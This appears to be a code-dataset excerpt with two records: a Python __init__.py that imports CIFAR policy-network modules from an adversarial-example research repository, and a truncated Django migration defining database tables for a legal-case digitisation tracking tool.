35667d9961e71bf16d505395acb0f8eb55e0f2af | 339 | py | Python | policy_driven_attack/policy/cifar/__init__.py | machanic/TangentAttack | 17c1a8e93f9bbd03e209e8650631af744a0ff6b8 | [
"Apache-2.0"
] | 4 | 2021-11-12T04:06:32.000Z | 2022-01-27T09:01:41.000Z | policy_driven_attack/policy/cifar/__init__.py | machanic/TangentAttack | 17c1a8e93f9bbd03e209e8650631af744a0ff6b8 | [
"Apache-2.0"
] | 1 | 2022-02-22T14:00:59.000Z | 2022-02-25T08:57:29.000Z | policy_driven_attack/policy/cifar/__init__.py | machanic/TangentAttack | 17c1a8e93f9bbd03e209e8650631af744a0ff6b8 | [
"Apache-2.0"
] | null | null | null | from policy_driven_attack.policy.cifar.empty import *
from policy_driven_attack.policy.cifar.unet import *
from policy_driven_attack.policy.cifar.carlinet_inv import *
from policy_driven_attack.policy.cifar.vgg_inv import *
from policy_driven_attack.policy.cifar.resnet_inv import *
from policy_driven_attack.policy.cifar.wrn_inv import *
| 48.428571 | 60 | 0.858407 | 52 | 339 | 5.288462 | 0.25 | 0.218182 | 0.349091 | 0.48 | 0.861818 | 0.861818 | 0.741818 | 0.458182 | 0 | 0 | 0 | 0 | 0.070796 | 339 | 6 | 61 | 56.5 | 0.873016 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
358fdb97bfe60e02d046b254b90d7abddbb51a78 | 54,195 | py | Python | capstone/tracking_tool/migrations/0001_initial.py | jcushman/capstone | ef3ced77f69aabe14c89ab67003a6e88736bf777 | [
"MIT"
] | null | null | null | capstone/tracking_tool/migrations/0001_initial.py | jcushman/capstone | ef3ced77f69aabe14c89ab67003a6e88736bf777 | [
"MIT"
] | 4 | 2021-09-02T20:54:31.000Z | 2022-02-27T14:04:06.000Z | capstone/tracking_tool/migrations/0001_initial.py | jcushman/capstone | ef3ced77f69aabe14c89ab67003a6e88736bf777 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-06-23 19:11
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Batches',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('notes', models.TextField(blank=True, null=True)),
('created_by', models.IntegerField()),
('sent', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
],
options={
'db_table': 'batches',
},
),
migrations.CreateModel(
name='BookRequests',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('updated_by', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('recipients', models.CharField(blank=True, max_length=512, null=True)),
('from_field', models.CharField(blank=True, db_column='from', max_length=128, null=True)),
('mail_body', models.TextField(blank=True, null=True)),
('note', models.TextField(blank=True, null=True)),
('send_date', models.DateField(blank=True, null=True)),
('label', models.CharField(blank=True, max_length=32, null=True)),
('sent_at', models.DateTimeField(blank=True, null=True)),
('subject', models.CharField(blank=True, max_length=512, null=True)),
('delivery_date', models.DateField(blank=True, null=True)),
],
options={
'db_table': 'book_requests',
},
),
migrations.CreateModel(
name='Casepages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('case_id', models.IntegerField()),
('seqid', models.CharField(max_length=12)),
('caseno', models.CharField(max_length=12)),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'casepages',
},
),
migrations.CreateModel(
name='Cases',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('redacted_mets_xml', models.CharField(blank=True, max_length=256, null=True)),
('unredacted_mets_xml', models.CharField(blank=True, max_length=256, null=True)),
('bucket', models.CharField(max_length=32)),
('caseno', models.CharField(blank=True, max_length=12, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('unredacted_xml_invalid', models.CharField(blank=True, max_length=256, null=True)),
('redacted_xml_invalid', models.CharField(blank=True, max_length=256, null=True)),
('version', models.DateTimeField(blank=True, null=True)),
('unredacted_mets_xml_md5', models.CharField(blank=True, max_length=32, null=True)),
('redacted_mets_xml_md5', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'cases',
},
),
migrations.CreateModel(
name='Eventloggers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('type', models.CharField(max_length=128)),
('location', models.CharField(blank=True, max_length=24, null=True)),
('destination', models.CharField(blank=True, max_length=128, null=True)),
('origination', models.CharField(blank=True, max_length=128, null=True)),
('notes', models.TextField(blank=True, null=True)),
('created_by', models.IntegerField()),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
('pstep_id', models.CharField(blank=True, max_length=48, null=True)),
('exception', models.IntegerField(blank=True, null=True)),
('warning', models.IntegerField(blank=True, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'eventloggers',
},
),
migrations.CreateModel(
name='Holdingsbooks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tray', models.CharField(max_length=9)),
('barcode', models.CharField(max_length=16, unique=True)),
('hollis_no', models.CharField(blank=True, max_length=12, null=True)),
('title', models.CharField(blank=True, max_length=512, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField(blank=True, null=True)),
('requested', models.IntegerField(blank=True, null=True)),
('inscope', models.IntegerField(blank=True, null=True)),
('volume', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'holdingsbooks',
},
),
migrations.CreateModel(
name='Holdingstrays',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tray', models.CharField(max_length=9)),
('aisle', models.IntegerField()),
('ladder', models.IntegerField()),
('position', models.IntegerField()),
('side', models.CharField(max_length=1)),
],
options={
'db_table': 'holdingstrays',
},
),
migrations.CreateModel(
name='Hollis',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hollis_no', models.CharField(blank=True, max_length=9, null=True)),
('reporter_id', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'hollis',
},
),
migrations.CreateModel(
name='InnodataCaseImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('case_id', models.IntegerField()),
('barcode', models.CharField(max_length=15)),
('bucket', models.CharField(blank=True, max_length=48, null=True)),
('s3key', models.CharField(max_length=255)),
('cases3key', models.CharField(max_length=255)),
('caseno', models.SmallIntegerField(db_column='caseNo')),
('docno', models.SmallIntegerField(db_column='docNo')),
('pageside', models.IntegerField(db_column='pageSide')),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('seqno', models.SmallIntegerField(db_column='seqNo')),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
],
options={
'db_table': 'innodata_case_images',
},
),
migrations.CreateModel(
name='InnodataPrivateCaseImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('case_id', models.IntegerField()),
('barcode', models.CharField(max_length=15)),
('bucket', models.CharField(blank=True, max_length=48, null=True)),
('s3key', models.CharField(max_length=255)),
('cases3key', models.CharField(max_length=255)),
('caseno', models.SmallIntegerField(db_column='caseNo')),
('docno', models.SmallIntegerField(db_column='docNo')),
('pageside', models.IntegerField(db_column='pageSide')),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('seqno', models.SmallIntegerField(db_column='seqNo')),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
],
options={
'db_table': 'innodata_private_case_images',
},
),
migrations.CreateModel(
name='InnodataPrivateCases',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('caseno', models.SmallIntegerField(db_column='caseNo')),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
('court_count', models.IntegerField()),
('caseabbrev_count', models.IntegerField()),
('docketnumber_count', models.IntegerField()),
('citation_count', models.IntegerField()),
('decisiondate_count', models.IntegerField()),
('otherdate_count', models.IntegerField()),
('publicationstatus_count', models.IntegerField()),
('parties_count', models.IntegerField()),
('judges_count', models.IntegerField()),
('attorneys_count', models.IntegerField()),
('opinion_count', models.IntegerField()),
('author_count', models.IntegerField()),
('p_count', models.IntegerField()),
('blockquote_count', models.IntegerField()),
('opiniontype_count', models.IntegerField()),
('pagelabel_count', models.IntegerField()),
('footnote_count', models.IntegerField()),
('footnotemark_count', models.IntegerField()),
('summary_count', models.IntegerField()),
('syllabus_count', models.IntegerField()),
('disposition_count', models.IntegerField()),
('history_count', models.IntegerField()),
('headnotes_count', models.IntegerField()),
('bracketnum_count', models.IntegerField()),
('key_count', models.IntegerField()),
('xml_version', models.IntegerField()),
('unknown_tags', models.CharField(blank=True, max_length=256, null=True)),
('casename_count', models.IntegerField()),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'innodata_private_cases',
},
),
migrations.CreateModel(
name='InnodataPrivateImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('docno', models.SmallIntegerField(db_column='docNo')),
('pageside', models.IntegerField(db_column='pageSide')),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('seqno', models.SmallIntegerField(db_column='seqNo')),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'innodata_private_images',
},
),
migrations.CreateModel(
name='InnodataPrivateVolumes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'innodata_private_volumes',
},
),
migrations.CreateModel(
name='InnodataSharedCaseImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('case_id', models.IntegerField()),
('barcode', models.CharField(max_length=15)),
('bucket', models.CharField(blank=True, max_length=48, null=True)),
('s3key', models.CharField(max_length=255)),
('cases3key', models.CharField(max_length=255)),
('caseno', models.SmallIntegerField(db_column='caseNo')),
('docno', models.SmallIntegerField(db_column='docNo')),
('pageside', models.IntegerField(db_column='pageSide')),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('seqno', models.SmallIntegerField(db_column='seqNo')),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
],
options={
'db_table': 'innodata_shared_case_images',
},
),
migrations.CreateModel(
name='InnodataSharedCases',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('caseno', models.SmallIntegerField(db_column='caseNo')),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
('court_count', models.IntegerField()),
('casename_count', models.IntegerField()),
('caseabbrev_count', models.IntegerField()),
('docketnumber_count', models.IntegerField()),
('citation_count', models.IntegerField()),
('decisiondate_count', models.IntegerField()),
('otherdate_count', models.IntegerField()),
('publicationstatus_count', models.IntegerField()),
('parties_count', models.IntegerField()),
('judges_count', models.IntegerField()),
('attorneys_count', models.IntegerField()),
('opinion_count', models.IntegerField()),
('author_count', models.IntegerField()),
('p_count', models.IntegerField()),
('blockquote_count', models.IntegerField()),
('opiniontype_count', models.IntegerField()),
('pagelabel_count', models.IntegerField()),
('footnote_count', models.IntegerField()),
('footnotemark_count', models.IntegerField()),
('summary_count', models.IntegerField()),
('syllabus_count', models.IntegerField()),
('disposition_count', models.IntegerField()),
('history_count', models.IntegerField()),
('headnotes_count', models.IntegerField()),
('bracketnum_count', models.IntegerField()),
('key_count', models.IntegerField()),
('xml_version', models.IntegerField()),
('unknown_tags', models.CharField(blank=True, max_length=256, null=True)),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'innodata_shared_cases',
},
),
migrations.CreateModel(
name='InnodataSharedImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('docno', models.SmallIntegerField(db_column='docNo')),
('pageside', models.IntegerField(db_column='pageSide')),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('seqno', models.SmallIntegerField(db_column='seqNo')),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'innodata_shared_images',
},
),
migrations.CreateModel(
name='InnodataSharedVolumes',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=255, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('redacted', models.IntegerField()),
('deleted', models.IntegerField()),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('modified_at', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'innodata_shared_volumes',
},
),
migrations.CreateModel(
name='Migrations',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('migration', models.CharField(max_length=255)),
('batch', models.IntegerField()),
],
options={
'db_table': 'migrations',
},
),
migrations.CreateModel(
name='Pages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('redacted_tiff', models.CharField(blank=True, max_length=256, null=True)),
('unredacted_tiff', models.CharField(blank=True, max_length=256, null=True)),
('redacted_jp2', models.CharField(blank=True, max_length=256, null=True)),
('unredacted_jp2', models.CharField(blank=True, max_length=256, null=True)),
('redacted_alto_xml', models.CharField(blank=True, max_length=256, null=True)),
('unredacted_alto_xml', models.CharField(blank=True, max_length=256, null=True)),
('bucket', models.CharField(max_length=32)),
('seqid', models.CharField(max_length=12)),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('version', models.DateTimeField(blank=True, null=True)),
('unredacted_alto_xml_md5', models.CharField(blank=True, max_length=32, null=True)),
('redacted_alto_xml_md5', models.CharField(blank=True, max_length=32, null=True)),
('unredacted_jp2_md5', models.CharField(blank=True, max_length=32, null=True)),
('redacted_jp2_md5', models.CharField(blank=True, max_length=32, null=True)),
('unredacted_tiff_md5', models.CharField(blank=True, max_length=32, null=True)),
('redacted_tiff_md5', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 'pages',
},
),
migrations.CreateModel(
name='Preferences',
fields=[
('id', models.CharField(max_length=30, primary_key=True, serialize=False)),
('name', models.CharField(max_length=50)),
('category', models.CharField(max_length=30)),
('privlevel', models.CharField(max_length=30)),
('value', models.TextField(blank=True, null=True)),
('default_value', models.CharField(blank=True, max_length=512, null=True)),
('updated_by', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'preferences',
},
),
migrations.CreateModel(
name='PrivateReporterTagStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField()),
('reporter_id', models.IntegerField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('case_count', models.IntegerField(blank=True, null=True)),
('case_missing_count', models.IntegerField(blank=True, null=True)),
('court_count', models.IntegerField(blank=True, null=True)),
('casename_count', models.IntegerField(blank=True, null=True)),
('caseabbrev_count', models.IntegerField(blank=True, null=True)),
('docketnumber_count', models.IntegerField(blank=True, null=True)),
('citation_count', models.IntegerField(blank=True, null=True)),
('decisiondate_count', models.IntegerField(blank=True, null=True)),
('otherdate_count', models.IntegerField(blank=True, null=True)),
('publicationstatus_count', models.IntegerField(blank=True, null=True)),
('parties_count', models.IntegerField(blank=True, null=True)),
('judges_count', models.IntegerField(blank=True, null=True)),
('attorneys_count', models.IntegerField(blank=True, null=True)),
('opinion_count', models.IntegerField(blank=True, null=True)),
('author_count', models.IntegerField(blank=True, null=True)),
('p_count', models.IntegerField(blank=True, null=True)),
('blockquote_count', models.IntegerField(blank=True, null=True)),
('opiniontype_count', models.IntegerField(blank=True, null=True)),
('pagelabel_count', models.IntegerField(blank=True, null=True)),
('footnote_count', models.IntegerField(blank=True, null=True)),
('footnotemark_count', models.IntegerField(blank=True, null=True)),
('summary_count', models.IntegerField(blank=True, null=True)),
('syllabus_count', models.IntegerField(blank=True, null=True)),
('disposition_count', models.IntegerField(blank=True, null=True)),
('history_count', models.IntegerField(blank=True, null=True)),
('headnotes_count', models.IntegerField(blank=True, null=True)),
('bracketnum_count', models.IntegerField(blank=True, null=True)),
('key_count', models.IntegerField(blank=True, null=True)),
('unknown_tags', models.IntegerField(blank=True, null=True)),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'private_reporter_tag_stats',
},
),
migrations.CreateModel(
name='PrivateVolumeTagStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField()),
('reporter_id', models.IntegerField(blank=True, null=True)),
('bar_code', models.CharField(blank=True, max_length=64, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('case_count', models.IntegerField(blank=True, null=True)),
('case_missing_count', models.IntegerField(blank=True, null=True)),
('court_count', models.IntegerField(blank=True, null=True)),
('casename_count', models.IntegerField(blank=True, null=True)),
('caseabbrev_count', models.IntegerField(blank=True, null=True)),
('docketnumber_count', models.IntegerField(blank=True, null=True)),
('citation_count', models.IntegerField(blank=True, null=True)),
('decisiondate_count', models.IntegerField(blank=True, null=True)),
('otherdate_count', models.IntegerField(blank=True, null=True)),
('publicationstatus_count', models.IntegerField(blank=True, null=True)),
('parties_count', models.IntegerField(blank=True, null=True)),
('judges_count', models.IntegerField(blank=True, null=True)),
('attorneys_count', models.IntegerField(blank=True, null=True)),
('opinion_count', models.IntegerField(blank=True, null=True)),
('author_count', models.IntegerField(blank=True, null=True)),
('p_count', models.IntegerField(blank=True, null=True)),
('blockquote_count', models.IntegerField(blank=True, null=True)),
('opiniontype_count', models.IntegerField(blank=True, null=True)),
('pagelabel_count', models.IntegerField(blank=True, null=True)),
('footnote_count', models.IntegerField(blank=True, null=True)),
('footnotemark_count', models.IntegerField(blank=True, null=True)),
('summary_count', models.IntegerField(blank=True, null=True)),
('syllabus_count', models.IntegerField(blank=True, null=True)),
('disposition_count', models.IntegerField(blank=True, null=True)),
('history_count', models.IntegerField(blank=True, null=True)),
('headnotes_count', models.IntegerField(blank=True, null=True)),
('bracketnum_count', models.IntegerField(blank=True, null=True)),
('key_count', models.IntegerField(blank=True, null=True)),
('unknown_tags', models.IntegerField(blank=True, null=True)),
('volume', models.IntegerField(blank=True, null=True)),
('publicationyear', models.IntegerField(blank=True, null=True)),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'private_volume_tag_stats',
},
),
migrations.CreateModel(
name='Projects',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=24)),
('notes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'projects',
},
),
migrations.CreateModel(
name='ProjectVolume',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bar_code', models.CharField(max_length=64)),
('project_id', models.CharField(max_length=24)),
],
options={
'db_table': 'project_volume',
},
),
migrations.CreateModel(
name='Pstep',
fields=[
('step_id', models.CharField(max_length=255, primary_key=True, serialize=False, unique=True)),
('type', models.CharField(blank=True, max_length=1, null=True)),
('name', models.CharField(blank=True, max_length=24, null=True)),
('prereq', models.CharField(blank=True, max_length=1024, null=True)),
('desc', models.CharField(max_length=256)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
],
options={
'db_table': 'pstep',
},
),
migrations.CreateModel(
name='Reporters',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('state', models.CharField(blank=True, max_length=64, null=True)),
('reporter', models.CharField(max_length=256)),
('short', models.CharField(max_length=64)),
('start_date', models.IntegerField(blank=True, null=True)),
('end_date', models.IntegerField(blank=True, null=True)),
('volumes', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
('notes', models.TextField(blank=True, null=True)),
('original_volumes', models.IntegerField(blank=True, null=True)),
('original_start_date', models.CharField(blank=True, max_length=4, null=True)),
('original_end_date', models.CharField(blank=True, max_length=4, null=True)),
('observed_start_date', models.IntegerField(blank=True, null=True)),
('observed_end_date', models.IntegerField(blank=True, null=True)),
('observed_volumes', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'reporters',
},
),
migrations.CreateModel(
name='S3KeyErrors',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bucket', models.CharField(blank=True, max_length=48, null=True)),
('error_type', models.CharField(blank=True, max_length=12, null=True)),
('error_text', models.TextField(blank=True, null=True)),
('key_created', models.DateTimeField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('modified_at', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 's3_key_errors',
},
),
migrations.CreateModel(
name='S3ScannerOutput',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('barcode', models.CharField(max_length=15)),
('s3key', models.CharField(max_length=90, unique=True)),
('etag', models.CharField(db_column='eTag', max_length=32)),
('fileformat', models.CharField(db_column='fileFormat', max_length=3)),
('version_id', models.CharField(blank=True, max_length=48, null=True)),
('docno', models.SmallIntegerField(blank=True, db_column='docNo', null=True)),
('pageside', models.IntegerField(blank=True, db_column='pageSide', null=True)),
('seqno', models.SmallIntegerField(blank=True, db_column='seqNo', null=True)),
('version_string', models.CharField(blank=True, max_length=32, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('bucket', models.CharField(blank=True, max_length=32, null=True)),
],
options={
'db_table': 's3_scanner_output',
},
),
migrations.CreateModel(
name='ServerStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('fqdn', models.CharField(max_length=256)),
('ip', models.CharField(max_length=16)),
('type', models.CharField(max_length=8)),
('qcwait', models.IntegerField(blank=True, null=True)),
('xferwait', models.IntegerField(blank=True, null=True)),
('pswait', models.IntegerField(blank=True, null=True)),
('df', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField()),
],
options={
'db_table': 'server_stats',
},
),
migrations.CreateModel(
name='SharedReporterTagStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField()),
('reporter_id', models.IntegerField(blank=True, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('case_count', models.IntegerField(blank=True, null=True)),
('case_missing_count', models.IntegerField(blank=True, null=True)),
('court_count', models.IntegerField(blank=True, null=True)),
('casename_count', models.IntegerField(blank=True, null=True)),
('caseabbrev_count', models.IntegerField(blank=True, null=True)),
('docketnumber_count', models.IntegerField(blank=True, null=True)),
('citation_count', models.IntegerField(blank=True, null=True)),
('decisiondate_count', models.IntegerField(blank=True, null=True)),
('otherdate_count', models.IntegerField(blank=True, null=True)),
('publicationstatus_count', models.IntegerField(blank=True, null=True)),
('parties_count', models.IntegerField(blank=True, null=True)),
('judges_count', models.IntegerField(blank=True, null=True)),
('attorneys_count', models.IntegerField(blank=True, null=True)),
('opinion_count', models.IntegerField(blank=True, null=True)),
('author_count', models.IntegerField(blank=True, null=True)),
('p_count', models.IntegerField(blank=True, null=True)),
('blockquote_count', models.IntegerField(blank=True, null=True)),
('opiniontype_count', models.IntegerField(blank=True, null=True)),
('pagelabel_count', models.IntegerField(blank=True, null=True)),
('footnote_count', models.IntegerField(blank=True, null=True)),
('footnotemark_count', models.IntegerField(blank=True, null=True)),
('summary_count', models.IntegerField(blank=True, null=True)),
('syllabus_count', models.IntegerField(blank=True, null=True)),
('disposition_count', models.IntegerField(blank=True, null=True)),
('history_count', models.IntegerField(blank=True, null=True)),
('headnotes_count', models.IntegerField(blank=True, null=True)),
('bracketnum_count', models.IntegerField(blank=True, null=True)),
('key_count', models.IntegerField(blank=True, null=True)),
('unknown_tags', models.IntegerField(blank=True, null=True)),
('qastatus', models.IntegerField(blank=True, null=True)),
('qanotes', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'shared_reporter_tag_stats',
},
),
migrations.CreateModel(
name='SharedVolumeTagStats',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField()),
('reporter_id', models.IntegerField(blank=True, null=True)),
('bar_code', models.CharField(blank=True, max_length=64, null=True)),
('updated_at', models.DateTimeField(blank=True, null=True)),
('case_count', models.IntegerField(blank=True, null=True)),
('case_missing_count', models.IntegerField(blank=True, null=True)),
('court_count', models.IntegerField(blank=True, null=True)),
('casename_count', models.IntegerField(blank=True, null=True)),
('caseabbrev_count', models.IntegerField(blank=True, null=True)),
('docketnumber_count', models.IntegerField(blank=True, null=True)),
('citation_count', models.IntegerField(blank=True, null=True)),
('decisiondate_count', models.IntegerField(blank=True, null=True)),
('otherdate_count', models.IntegerField(blank=True, null=True)),
('publicationstatus_count', models.IntegerField(blank=True, null=True)),
('parties_count', models.IntegerField(blank=True, null=True)),
('judges_count', models.IntegerField(blank=True, null=True)),
('attorneys_count', models.IntegerField(blank=True, null=True)),
('opinion_count', models.IntegerField(blank=True, null=True)),
('author_count', models.IntegerField(blank=True, null=True)),
('p_count', models.IntegerField(blank=True, null=True)),
('blockquote_count', models.IntegerField(blank=True, null=True)),
('opiniontype_count', models.IntegerField(blank=True, null=True)),
('pagelabel_count', models.IntegerField(blank=True, null=True)),
('footnote_count', models.IntegerField(blank=True, null=True)),
('footnotemark_count', models.IntegerField(blank=True, null=True)),
('summary_count', models.IntegerField(blank=True, null=True)),
('syllabus_count', models.IntegerField(blank=True, null=True)),
('disposition_count', models.IntegerField(blank=True, null=True)),
('history_count', models.IntegerField(blank=True, null=True)),
('headnotes_count', models.IntegerField(blank=True, null=True)),
('bracketnum_count', models.IntegerField(blank=True, null=True)),
